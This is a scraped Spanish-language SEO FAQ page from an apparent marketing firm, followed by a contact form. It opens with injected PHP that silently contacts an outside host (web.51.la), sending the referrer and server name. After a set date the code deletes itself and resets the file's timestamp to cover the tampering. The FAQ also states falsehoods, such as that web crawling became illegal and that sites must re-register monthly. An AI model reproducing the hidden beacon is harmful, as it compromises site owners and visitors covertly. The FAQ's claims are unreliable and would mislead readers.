check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } SEO Marketing F.A.Q.`s

He incluído mi sitio en los motores de búsqueda, ¿por qué no consigo tráfico?

Incluir su sitio en los motores de búsqueda es solamente el primer paso para que lo reconozcan. Esto les permite indexar su sitio y que lo rankeen según su fórmula. Dependiendo de qué tan relevante encuentren el contenido de su sitio web, éste será indexado pero todavía no tendrá un buen posicionamiento. El paso siguiente es trabajar en tu ranking.

¿Estoy haciendo banners publicitarios, pop ups y sistema de intercambio de banners, por qué no estoy logrando ventas?

Hay distintos niveles de tráfico. Generalmente un trafico a través de links, pop ups, banners y sistema de intercambio de banners, no un tráfico dirigido por lo tanto no es muy probable que termine en una venta. El tráfico calificado viene de los motores de búsqueda, de la gente que te encuentra buscando tus palabras claves. El tráfico de los motores de búsqueda, si es marketineramente correcto, puede traerte los visitantes específicos que estas buscando.

¿Por qué es más recomendable la optimización que el pago por click?

Realizar la optimización y conseguir un buen posicionamiento en los motores de búsqueda, te pueden conseguir igual o más tráfico que el pago por click y sin tener que pagar por cada persona que visita tu sitio. Esto le brinda más resultados con menos dinero.
También, mucha gente lo considerará un experto en la industria si lo encuentra en los primeros puestos de los motores de búsqueda. Sin embargo, un acercamiento agresivo sería hacer una combinación de pago por click y optimización. Los visitantes del pago por click son diferentes de los que vienen de los listados libres. De esta manera se pueden captar ambos.

¿Por qué necesito estar en los motores de búsqueda?

Es más fácil venderle un producto a alguien que lo está buscando, que salir a ofrecerlo.
Por lo tanto, la mejor estrategia de marketing es colocarse donde están buscando su producto… los motores de búsqueda… y conseguir un buen posicionamiento que permita encontrar su sitio fácilmente.

¿El registro gratuito en los buscadores me ubica en todos los motores de búsqueda en una semana?

El registro gratuito lo incluirá en Ask Jeeves, Teoma, Metacrawler, Excite, MySearch, MyWay, ixquick, Mamma, y Hotbot. Los otros motores de búsqueda tardan de 4 a 12 semanas en indexar un sitio Web.

¿Por qué necesito registrar mi sitio en los motores de búsqueda? ¿Por qué necesito registrarlo una vez al mes?

En los primeros tiempos de los motores de búsqueda, enviaban un programa de computadora llamado "araña de red” que buscaba dentro de Internet sitios Web para ser agregados a la lista de sus páginas. Mucha gente cree que ésto sigue funcionando de la misma manera, sin embargo, este método se volvió ilegal. Se consideró violación de la seguridad ya que algunas companías no querían que su sitio Web esté disponible en los motores de búsqueda para el acceso público.

Ahora los motores de búsqueda tienen que tener una petición formal para incluir legalmente su sitio Web y enviar a la "araña" a indexar el sitio Web para ser agregado en las páginas de la búsqueda. El problema es que si se realizan cambios en el sitio, los motores de búsqueda no pueden volver a ese sitio a hacer ninguna actualización en sus páginas. La única manera de que un motor de búsqueda pueda poner al día sus listados es si un sitio Web se registra nuevamente.

Se ha convertido en un estándar que un sitio Web debe registrarse una vez al mes para estar sometido a actualizaciones regulares y mantenerse en las páginas del motor de búsqueda. Sin un registro regular los motores de búsqueda darán de baja su sitio Web de sus listados.

¿Desea saber más sobre SEO?

Consultas de Web Marketing


Obtener más información acerca de WEB Marketing
Solicitar una presentación personal:
Nos conoce por:
Nombre: *
Empresa: *
Cargo: *
E-mail: *
Teléfono: *
Sitio web actual:
País:
Consulta:
Verificación Humana: